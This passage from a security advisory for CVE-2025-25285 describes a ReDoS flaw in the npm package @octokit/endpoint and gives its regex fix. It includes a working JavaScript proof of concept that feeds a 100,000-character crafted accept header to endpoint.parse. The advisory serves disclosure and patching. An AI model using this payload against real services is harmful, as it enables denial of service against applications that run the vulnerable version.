\"./node_modules/@octokit/endpoint/dist-src/parse.js\";\nconst options = { \n method: \"POST\",\n url: \"/graphql\", // Ensure that the URL ends with \"/graphql\"\n headers: {\n accept: \"\" + \"A\".repeat(100000) + \"-\", // Pass in the attack string\n \"content-type\": \"text/plain\",\n },\n mediaType: {\n previews: [\"test-preview\"], // Ensure that mediaType.previews exists and has values\n format: \"raw\", // Optional media format\n },\n baseUrl: \"https://api.github.com\",\n};\n\nconst startTime = performance.now();\nendpoint.parse(options);\nconst endTime = performance.now();\nconst duration = endTime - startTime;\nconsole.log(`Endpoint execution time: ${duration} ms`);\n```\n1. **Import the `endpoint` module**: First, import the `endpoint` module from the npm package `@octokit/endpoint`, which is used for handling GitHub API requests.\n\n2. **Construct the `options` object that triggers a ReDoS attack**: The following member variables are critical in constructing the `options` object:\n- `url`: Set to `\"/graphql\"`, ensuring the URL ends with `/graphql` to match the format for GitHub\u0027s GraphQL API.\n- `headers`:\n\u003e `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n\u003e \n- `mediaType`:\n\u003e`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n\u003e\n\u003e`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\u003cimg width=\"800\" alt=\"2\" src=\"https://github.com/user-attachments/assets/9fc865a4-e150-42d5-bcd5-93ab6b0c29ef\" /\u003e\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint package`, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub\u0027s API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(?\u003c![\\w-])[\\w-]+(?=-preview)`, we prevent the issue.\nHere is how this change solves the problem:\nHere is how this change solves the problem:\n\n1. **Old Regular Expression**: `/[\\w-]+(?=-preview)/g`\n- This regular expression matches any sequence of word characters (`\\w`) and hyphens (`-`) followed by `-preview`.\n- The issue arises when the regex engine encounters a long string of characters followed by a `-`, causing excessive backtracking and high CPU usage.\n2. **New Regular Expression**: `(?\u003c![\\w-])[\\w-]+(?=-preview)`\n- This updated regular expression uses a negative lookbehind `(?\u003c![\\w-])`, ensuring that the matched string is not preceded by any word characters or hyphens (`\\w` or `-`).\n- The new expression still matches sequences of word characters and hyphens, but the negative lookbehind ensures it doesn\u0027t cause backtracking issues when processing long attack strings.\n- By adding this lookbehind, we effectively prevent the vulnerability, ensuring the regex operates efficiently without excessive backtracking.\n\n#### Full Solution Example:\nThe specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:\n1. **Update the Regular Expression**: In the `parse.ts` file (or wherever the original regex is defined), replace the existing regular expression:\n```ts\nconst previewsFromAcceptHeader =\n headers.accept.match(/[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\nWith the updated one:\n```ts\nconst previewsFromAcceptHeader =\n headers.accept.match(/(?\u003c![\\w-])[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\n\n2. **Test the Change**: After updating the regular expression, thoroughly test the application with both regular and malicious inputs to ensure that:\n- The functionality remains correct and the expected matches still occur.\n- The performance improves and the ReDoS vulnerability no longer occurs when handling large attack strings.\n3. **Deploy the Fix**: Once the solution is verified, deploy the fix to your production environment to protect against potential attacks.",
"id": "GHSA-x4c5-c7rf-jjgv",
"modified": "2025-02-14T22:19:51Z",
"published": "2025-02-14T17:56:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25285"
},
{
"type": "WEB",
"url": "https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8"
},
{
"type": "PACKAGE",
"url": "https://github.com/octokit/endpoint.js"
},
{
"type": "WEB",
"url": "https://github.com/octokit/endpoint.js/blob/main/src/parse.ts"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…